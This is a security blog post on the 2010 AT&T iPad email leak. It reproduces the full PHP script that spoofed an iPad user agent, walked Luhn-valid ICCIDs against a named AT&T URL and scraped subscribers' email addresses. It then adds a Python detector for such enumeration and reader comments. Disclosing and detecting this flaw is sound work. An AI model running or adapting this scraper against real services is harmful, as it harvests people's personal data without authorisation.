114,000 iPad Owners: The Script that Harvested Their E-mail Addresses

Here is the script referenced in the Gawker story from earlier that describes how a number of early iPad 3G subscribers, including names like Harvey Weinstein, Michael Bloomberg, Diane Sawyer, and Rahm Emanuel, had their e-mail addresses revealed via a poorly designed web application hosted by AT&T.

Goatse Security, named for the famous Internet shock image, wrote the script to harvest e-mail addresses by providing ICC-ID numbers (integrated circuit card identifier, a number that associates a SIM card with a subscriber) and parsing the returned e-mail address.

High profile users from the list of harvested e-mail addresses.

After speaking with Goatse Security member Weev, he was kind enough to share the script:

<?php
// iPad 3G Account Slurper
//
// Usage: ./ipadump.php ICCID-base count
// (The script generates the final checkdigit to produce ICCIDs from the entered base)

$useragent="Mozilla/5.0 (iPad)"; //Spoof as iPad
$ICCIDroot = $_SERVER['argv'][1];
$ICCIDcount = $_SERVER['argv'][2];
$counter = 0; //Loop counter (initialised here so PHP does not warn on first use)

function genluhn($number){ //Crappy home-made Luhn checkdigit generator
    $array = array(); //Digits of $number, rightmost first
    $total = 0;
    $i = strlen($number)-1;
    do {
        $array[] = $number[$i];
        $i--;
    } while ($i > -1);
    $i = 0;
    foreach ($array as $digit) {
        if (!($i & 1)){ //Double every second digit, starting with the rightmost
            $digit = $digit * 2;
            if ($digit >= 10) {
                $digit = $digit - 9;
            }
        }
        $total += $digit;
        $i++;
    }
    $luhn = 10 - ($total % 10);
    if ($luhn == 10) $luhn=0;
    return $luhn;
}

while (1) { //Continue FOREVER
    $ch = curl_init(); //Set up cURL
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); //Since theres a lot of redirection
    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies"); //See later
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //Returns any and all data
    $ICCID = $ICCIDroot.genluhn(strval($ICCIDroot)); //Generate checkdigit and attach it to the ICCID
    curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/openPage?ICCID=".strval($ICCID)."&IMEI=0");
    $output = curl_exec($ch); //Load first page with ICCID
    curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/Customer");
    $output = curl_exec($ch); //Now load page that is normally redirected with JavaScript. cURL is nice and passes the previously GET'd info
    curl_close($ch);
    //print $output; //Prints HTML result
    if (!($counter % 50)) echo "-".strval($ICCID)."-\n"; //Prints ICCID every 50 counts just to keep track of how far the script has gotten
    //Parse output. Terribly sloppy
    if (preg_match("/<title>Error<\/title>/", $output, $match)) {
        preg_match("/<div class=\"info-container\">(.*)<br>(.*)<br>/msU", $output, $match);
        $match[0] = preg_replace("/<div class=\"info-container\">\n\s\s+/","",$match[0]);
        $match[0] = preg_replace("/<\/b><br>/", "<\/b> <br>", $match[0]); //Because I want space between the period and the next sentence, dammit
        $errnum = strip_tags($match[0]);
        $status = "Error! ".$errnum; //Return specific error message
    } else if (preg_match("<input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\".*\@.*\" autocapitalization=\"off\" autocorrect=\"off\">", $output, $match)) {
        $match[0] = preg_replace("/input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\"/","",$match[0]);
        $status = preg_replace("/\" autocapitalization=\"off\" autocorrect=\"off\"/", "", $match[0]); //Return email address
    } else {
        $status = "Inactive"; //Assume SIM is inactive if nothing tells us otherwise. Bad logic, will fix.
    }
    if ($status != "Inactive") echo strval($ICCID)." : ".$status."\n"; //Print ICCID with error message or email address. Can print if ICCID is inactive, but it makes for a long, redundant log.
    if ($counter == $ICCIDcount) exit;
    $ICCIDroot++; //step ICCID
    $counter++; //step loop counter
}
?>

There are probably a few things worth pointing out. They had to set the user-agent string to be the iPad as shown:

$useragent="Mozilla/5.0 (iPad)";

The vulnerable URL at att.com was:

https://dcp2.att.com/OEPClient/openPage?ICCID=Insert number here&IMEI=0

And that’s it: an e-mail address gets returned in the successful iterations (active ICCID) and parsed. There’s no hack, no infiltration, and no breach, just a really poorly designed web application that returns an e-mail address when an ICCID is passed to it.
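As an added example (not code from this post or from Goatse Security), here is the server-side view of the activity described above: a small Python detector, run over constructed access-log lines, that scores each client on how many distinct ICCIDs it asked the lookup page for and how many of those were consecutive Luhn-valid values. That is exactly the stepping pattern the script above produces (base incremented by one, check digit appended), so it is the signature an operator of such an endpoint would want to alarm on. The log format, IP addresses, ICCID values and thresholds are all constructed for the example; only the path and parameter names follow the URL quoted above.

```python
"""
Detector for ICCID enumeration against a lookup page such as
/OEPClient/openPage?ICCID=...&IMEI=0, run over constructed access-log lines.
Example code added to the post; nothing here is from the original script.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Combined log format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: one client walks six consecutive ICCID bases
# (8900000000000000100 .. 105, each with its Luhn check digit appended),
# another client looks up a single ICCID. Addresses and ICCIDs are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Jun/2010:14:01:01 -0400] "GET /OEPClient/openPage?ICCID=89000000000000001002&IMEI=0 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (iPad)"
10.0.0.5 - - [09/Jun/2010:14:01:01 -0400] "GET /OEPClient/Customer HTTP/1.1" 200 4120 "-" "Mozilla/5.0 (iPad)"
10.0.0.5 - - [09/Jun/2010:14:01:02 -0400] "GET /OEPClient/openPage?ICCID=89000000000000001010&IMEI=0 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (iPad)"
10.0.0.5 - - [09/Jun/2010:14:01:02 -0400] "GET /OEPClient/openPage?ICCID=89000000000000001028&IMEI=0 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (iPad)"
10.0.0.5 - - [09/Jun/2010:14:01:03 -0400] "GET /OEPClient/openPage?ICCID=89000000000000001036&IMEI=0 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (iPad)"
10.0.0.5 - - [09/Jun/2010:14:01:03 -0400] "GET /OEPClient/openPage?ICCID=89000000000000001044&IMEI=0 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (iPad)"
10.0.0.5 - - [09/Jun/2010:14:01:04 -0400] "GET /OEPClient/openPage?ICCID=89000000000000001051&IMEI=0 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (iPad)"
192.0.2.77 - - [09/Jun/2010:14:05:30 -0400] "GET /OEPClient/openPage?ICCID=89000000000000001028&IMEI=0 HTTP/1.1" 302 0 "-" "Mozilla/5.0 (iPad)"
192.0.2.77 - - [09/Jun/2010:14:05:31 -0400] "GET /OEPClient/Customer HTTP/1.1" 200 4120 "-" "Mozilla/5.0 (iPad)"
"""


def luhn_check_digit(payload: str) -> int:
    """Check digit that makes payload+digit pass the Luhn test (the same
    scheme the script's genluhn computes: double every second digit
    starting from the rightmost digit of the payload)."""
    total = 0
    for i, ch in enumerate(reversed(payload)):
        d = int(ch)
        if i % 2 == 0:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return (10 - total % 10) % 10


def luhn_valid(number: str) -> bool:
    """True when the last digit is the correct Luhn check digit."""
    return (number.isdigit() and len(number) > 1
            and luhn_check_digit(number[:-1]) == int(number[-1]))


def parse_line(line: str):
    """Extract client IP, request path, ICCID parameter and user agent,
    or None for lines that do not match the combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlparse(m.group("target"))
    params = parse_qs(target.query)
    return {"ip": m.group("ip"), "path": target.path,
            "iccid": params.get("ICCID", [None])[0], "ua": m.group("ua")}


def detect_enumeration(log_text: str, lookup_path: str = "/OEPClient/openPage",
                       min_distinct: int = 5, min_consecutive_ratio: float = 0.5):
    """Return {ip: stats} for clients that look like they are walking the
    ICCID space: at least min_distinct distinct ICCIDs requested, and at
    least min_consecutive_ratio of the successive Luhn-valid requests
    differing by exactly one in the base (all digits but the check digit).
    Thresholds are constructed for the example, not tuned values."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"] == lookup_path and rec["iccid"]:
            seq = per_ip[rec["ip"]]
            if rec["iccid"] not in seq:
                seq.append(rec["iccid"])
    findings = {}
    for ip, iccids in per_ip.items():
        valid = [x for x in iccids if luhn_valid(x)]
        consecutive = sum(1 for a, b in zip(valid, valid[1:])
                          if int(b[:-1]) - int(a[:-1]) == 1)
        pairs = max(len(valid) - 1, 1)
        stats = {"distinct": len(iccids), "luhn_valid": len(valid),
                 "consecutive": consecutive}
        if len(iccids) >= min_distinct and consecutive >= min_consecutive_ratio * pairs:
            findings[ip] = stats
    return findings


if __name__ == "__main__":
    for ip, stats in detect_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {stats}")
```

On the constructed log the detector flags 10.0.0.5 (six distinct ICCIDs, all Luhn-valid, five consecutive steps) and ignores 192.0.2.77, which looked up one ICCID. The point of keying on consecutive Luhn-valid values rather than raw request volume is that a walk of the identifier space is distinguishable from a busy but legitimate activation page even at a modest rate, which is the kind of alarm the single client hammering this URL should have raised.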

Filed Under: Enumeration


Comments (26)


  1. jpatterson says:

    well, good for you!

  2. [...] upshot is that, as this page rightly points out (thanks to @securityninja for the link) “There’s no hack, no infiltration, and no [...]

  3. [...] reports that by exploiting a vulnerability in the AT&T Web site, hacker group Goatse Security was able to collect email addresses associated with the SIM [...]

  4. [...] Prefect has the actual PHP script itself, courtesy of Goatse member Weev, if you would like to take a look at it now that AT&T has fixed the [...]

  5. CaptainObvious says:

    “There’s no hack, no infiltration, and no breach, just a really poorly designed web application…”

    Like “real” hacks are all different somehow.

  6. [...] Web application that returns e-mail address when ICC-ID is passed to it,” says Praetorian Security Group in a blog post on the [...]

  7. John says:

    This is the very definition of a hack – “modification of a program or device to give the user access to features that were otherwise unavailable” You fake your user-agent and then hammer a URL, it’s called hacking. What is surprising is that AT&T didn’t have any Denial of Service measures in place, surely the one IP hitting this url a million times should have raised some alarms.

    • Prefect says:

      That’s kind of semantics right? Based on that definition, your browser is performing a “hack” right now to read this web site.

      I guess my point is that it doesn’t rise to the level of a criminal intrusion, being more akin to an NMAP scan, which is what popular media thinks of with the word “hack”.

  8. [...] as can be read on praetorianprefect.com, by means of a relatively simple PHP script a leak in an AJAX API was [...]

  9. David Davidson says:

    Just by reading the description of the hack, one can easily visualize in his preferred programming language the way they did the job, just need the pattern of an ICC-ID, the script is pretty uninteresting at this point. It only shows that Gawker will pay anyone, even 4chan tards to discredit Apple in any way (as shown by the title which is false)

    • Prefect says:

      Seeing the script helped to make some sense out of what Gawker was reporting, and I had wanted to see the actual request to AT&T to see if there was anything more to it:

      https://dcp2.att.com/OEPClient/openPage?ICCID=Insert number here&IMEI=0

      Apple must have known how this worked at some level, and therefore owns some culpability for not objecting to the design. But the initial Gawker reporting was over the top and misleading.

      But you’re entitled to your opinion.

  10. [...] wrote a PHP script that flooded AT&T’s Web site with possible ICC-ID numbers and logged responses when the [...]

  11. [...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [...]

  12. [...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [Computer [...]

  13. [...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [Computer [...]

  14. [...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [Computer [...]

  15. jackie cox says:

    looks like an inside job by employee/coder at AT&T, purposefully writing vulnerable script for a PR Stunt involving Weev. A Cheap shot aimed at Apple/Google, through another interface.

    Just another windows/microsoft type sleazy goings on, who have a neverending viral problem, fixed by buying new computers and viral software, because of a poor operating system, compared to apple who fixes any breach virtually before it occurs for free.

    It may involve the israel-chinese affair of trying to boot google-apple because of their reluctance to censor data for pseudo-religious/political-business/competition reasons. And a really sleazy alogical justification shot at not allowing some of apple's new single face computers to be sold in israel

    This is the great nothing, a cheap shot at a bad PR Stunt, taken up in the news media, who does as they are told

  16. [...] with law enforcement to investigate. To get the email addresses, the hackers took advantage of a home grown PHP script, which sent ICC ID numbers from SIM's to the AT&T server. The server was expecting to be called [...]

  17. [...] The script that harvested 114,000 iPad users’ data [...]

  18. FDunn says:

    If the data is in clear text, not protected and can simply be parsed, I hardly call that a hack.

    That almost sounds like what goes on in any company every day. That data should have been behind a firewall.

    Sounds totally irresponsible on AT&T's part.